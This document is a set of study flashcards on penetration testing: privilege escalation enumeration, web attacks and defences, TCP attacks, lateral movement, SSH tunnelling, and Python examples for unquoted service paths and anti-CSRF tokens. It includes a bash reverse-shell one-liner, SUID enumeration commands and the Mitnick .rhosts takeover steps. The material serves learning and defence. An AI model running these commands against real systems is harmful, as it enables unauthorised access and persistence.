Final Flashcards
What are the 4 main ways to do Privilege Escalation?
- Known Exploits
- Direct Method
- Indirect Method
- Credential Theft
What command shows you what you can run as sudo?
sudo -l
What are setuid programs?
Executables with the setuid bit set; when run, the process takes on the effective UID of the file's owner (root-owned ones are the interesting targets, see GTFOBins)
What command shows all setUID programs on the system?
find / -type f -perm -4000 2>/dev/null
What are capabilities?
Fine-grained slices of root's privileges (e.g. cap_setuid, cap_net_raw) that can be attached to an executable, so a process gets that one ability without being setuid root
What command shows all capabilities on the system?
getcap -r / 2>/dev/null
What is UAC on Windows?
Similar to sudo: an administrator logs in with a filtered (medium-integrity) token and must consent to a prompt before a process gets the full admin token
How can you view the crontab?
cat /etc/crontab (also check /etc/cron.d/, /etc/cron.hourly|daily|weekly|monthly/, and crontab -l for the current user)
How can you find world-writable config files?
find /etc -type f -perm -2 2>/dev/null   (-perm -2 matches the "other write" bit, same as -perm -o=w)
How can you find scheduled tasks on windows?
schtasks /query /fo LIST /v
How can you find windows services?
sc query (sc qc <name> shows a service's binary path and account)
What is LOLBAS?
GTFOBins for Windows
Explain how Windows paths can be exploited
Unquoted service binary paths containing spaces: Windows treats each space as a possible end of the executable name and appends .exe, so for C:\Program Files\Some App\svc.exe it first tries C:\Program.exe, then C:\Program Files\Some.exe. If you can write to one of those directories, your binary runs as the service account
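The search order described above, as an added Python example (not from the flashcards): given an ImagePath string as stored under HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath, it lists the .exe paths Windows would try before the real binary and the directory an attacker would need write access to for each. The sample ImagePath values are constructed, not real services; on a live box you would feed it the output of wmic service get name,pathname or sc qc <name>.

```python
import ntpath  # Windows path handling that works on any host OS

# Constructed sample of service ImagePath values (not real services).
SAMPLE_SERVICES = {
    "QuotedSvc":   '"C:\\Program Files\\Vendor Tools\\agent.exe" -service',
    "UnquotedSvc": "C:\\Program Files\\Vendor Tools\\Some App\\updater.exe /run",
    "NoSpaceSvc":  "C:\\Windows\\system32\\svchost.exe -k netsvcs",
}


def hijack_candidates(image_path):
    """Paths Windows tries, in order, before reaching the real binary of an
    unquoted ImagePath. CreateProcess treats each space as a possible end of
    the executable name and appends .exe, so
        C:\\Program Files\\A B\\c.exe /x
    is tried as C:\\Program.exe, C:\\Program Files\\A.exe, then the real file.
    Quoted paths and paths without spaces yield no candidates."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break                      # reached the intended executable; stop
        candidates.append(prefix + ".exe")
    # If no token ends in .exe (extension omitted), every prefix is returned,
    # the last of which is the real binary with .exe appended.
    return candidates


def writable_dirs_needed(image_path):
    """Directory the attacker must be able to write to, one per candidate."""
    return [ntpath.dirname(c) for c in hijack_candidates(image_path)]


def find_vulnerable(services):
    """Map service name -> candidate hijack paths for every unquoted
    ImagePath that has at least one space before the executable name."""
    return {name: hijack_candidates(p) for name, p in services.items()
            if hijack_candidates(p)}


if __name__ == "__main__":
    for name, cands in find_vulnerable(SAMPLE_SERVICES).items():
        print(name)
        for c, d in zip(cands, writable_dirs_needed(SAMPLE_SERVICES[name])):
            print(f"  tries {c!r}  (needs write access to {d!r})")
```

Only the candidates whose directory is writable by your current user matter; icacls on each returned directory is the follow-up check.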
What's the difference between /etc/shadow and /etc/passwd?
/etc/passwd lists the user accounts (world-readable, no hashes on modern systems)
/etc/shadow holds the password hashes (readable only by root)
What is in band SQLi?
Uses the same communication channel to execute the attack and retrieve the results (e.g. UNION-based and error-based SQLi)
Whats the best way to defend against SQLi?
Prepared statements / parameterised queries (input validation is a secondary layer, not a substitute)
What is Cross Site Request Forgery (CSRF)?
An attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated
What is Stored CSRF?
When the CSRF payload is stored on the target site itself (e.g. in a comment or profile field), so victims trigger it just by browsing the site while logged in
What actions can you perform with a CSRF attack?
GET (links, images, redirects)
POST (auto-submitted HTML forms)
PUT and DELETE only if the target allows them cross-origin: they must be sent by script, and the browser's CORS preflight blocks them otherwise
What does the Same Origin Policy (SOP) protect against?
Cross-origin reads and non-simple requests: a script on one origin cannot read another origin's responses, and requests such as an HTTP PUT to another origin are only sent if a CORS preflight permits them. It does not stop simple cross-origin GET/POST being sent with the victim's cookies, which is why CSRF still works
Whats the best way to defend against CSRF?
Anti-CSRF token (unpredictable, tied to the session, checked on every state-changing request); SameSite cookies add a second layer
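A synchroniser-style anti-CSRF token, as an added Python example (not from the flashcards): the token is an HMAC over the session id and a fresh nonce under a server key, so it needs no server-side storage, is bound to one session, and is compared in constant time. The request objects, session ids and server key are constructed stand-ins for real HTTP requests. The forged request shows why the defence works together with the same-origin policy: the attacker's page can make the victim's browser send the form with its cookies, but cannot read the page that carried the token.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; assumption: generated once and never sent to clients.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id, key=SERVER_KEY):
    """Token embedded in the form: nonce.HMAC(key, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token, key=SERVER_KEY):
    """Recompute the MAC for this session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False                     # missing or malformed token
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_transfer(request, key=SERVER_KEY):
    """State-changing POST handler. `request` is a constructed dict:
    {"cookies": {...}, "form": {...}} standing in for a real HTTP request."""
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return 401, "no session"
    if not verify_csrf_token(session_id, request.get("form", {}).get("csrf_token"), key):
        return 403, "csrf check failed"
    form = request["form"]
    return 200, f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    victim = "sess-victim"                      # constructed session id
    token = issue_csrf_token(victim)            # served inside the victim's own page
    legit = {"cookies": {"session": victim},
             "form": {"csrf_token": token, "to": "alice", "amount": "100"}}
    # Attacker's page auto-submits a form: browser attaches the victim's cookie,
    # but the attacker never saw the token (SOP blocks reading the victim's page).
    forged = {"cookies": {"session": victim},
              "form": {"to": "attacker", "amount": "100"}}
    # Attacker reuses a token from their own session: MAC is bound to sess-attacker.
    replayed = {"cookies": {"session": victim},
                "form": {"csrf_token": issue_csrf_token("sess-attacker"),
                         "to": "attacker", "amount": "100"}}
    for name, req in [("legit", legit), ("forged", forged), ("replayed", replayed)]:
        print(name, handle_transfer(req))
```

A production handler would also rotate the token after login and reject the request if the session cookie is not marked SameSite, but the binding of token to session is the core of the check.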
What is Cross Site Scripting (XSS)?
A type of injection, in which malicious scripts are injected into otherwise benign and trusted websites
What is the TCP handshake?
SYN, SYN+ACK, ACK
What is SYN Flooding?
An attacker sends many (usually spoofed) SYNs and never completes the handshake; the half-open connections fill the server's SYN (backlog) queue so legitimate SYNs are dropped
How can SYN Flooding be prevented?
Shorter retransmission timeouts / fewer SYN+ACK retries (half-open entries expire sooner)
Larger SYN queue (backlog)
TCP cache
SYN cookies (no state kept until the ACK returns)
What is a general command to get a reverse shell?
/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1   (bash-only: /dev/tcp is a bash feature, and the attacker must already be listening, e.g. nc -lvnp <port>)
How does the Mitnick attack work?
- Silence the trusted server (e.g. SYN flood it) so it cannot respond to the victim
- The attacker creates and hijacks a TCP session by spoofing the following from the trusted server's address:
1) SYN to the victim (the victim's SYN+ACK goes to the silenced trusted server, so the attacker never sees it)
2) ACK with a guessed sequence number (works because the victim's ISN was predictable)
3) RSH command (e.g. appending "+ +" to .rhosts), while also spoofing the return connection the victim opens back to the trusted server
How do SYN cookies defend against SYN flooding?
- The server keeps no SYN queue: the SYN+ACK's sequence number is a keyed hash (the cookie) of the connection 4-tuple and a coarse timestamp, and the connection is only created when an ACK carrying cookie+1 comes back
- A spoofing attacker never receives the SYN+ACK, so it cannot learn the cookie and cannot produce a valid ACK
When injecting data into an existing TCP session, why do you not have to guess the sequence number exactly?
As long as the sequence number falls inside the receiver's window (RCV.NXT up to RCV.NXT + RCV.WND), the segment is buffered and handed to the application once the gap before it is filled
Lateral Movement
Any “advancement” in the network that is not an “elevation”
What are the different lateral movement techniques?
PsExec
WinRM
WMI
Smbexec
What is a Pass-The-Hash attack?
When you can authenticate (e.g. over NTLM) with just the hash of the password instead of the plaintext
What is static port forwarding?
Destinations are fixed
One tunnel for each destination
What is dynamic port forwarding?
Destinations are NOT fixed
One tunnel for many destinations
Uses SOCKS proxy
What does a forward static port forwarding command look like?
ssh -4NT -L [local port]:[end goal ip]:[end goal port] user@[intermediate ip]   (run on the local machine; -4 IPv4 only, -N no remote command, -T no tty)
What does a reverse static port forwarding command look like?
ssh -4NT -R 0.0.0.0:[home port]:[end goal ip]:[end goal port] user@[home ip]   (run on the remote machine; -R, not -L, makes it reverse, and binding 0.0.0.0 on the home side needs GatewayPorts yes in its sshd_config)
Explain Metasploit route and autoroute
Route - route to a particular IP address through an existing session
Autoroute - Post module to add new routes found from a session
What is a wormable vulnerability?
A network vulnerability which can allow a worm to self-propagate by automatically gaining RCE on new hosts
When we perform a stack buffer overflow, what values can we overwrite on the stack?
The return address
The saved (previous) frame pointer
The function arguments (above the return address)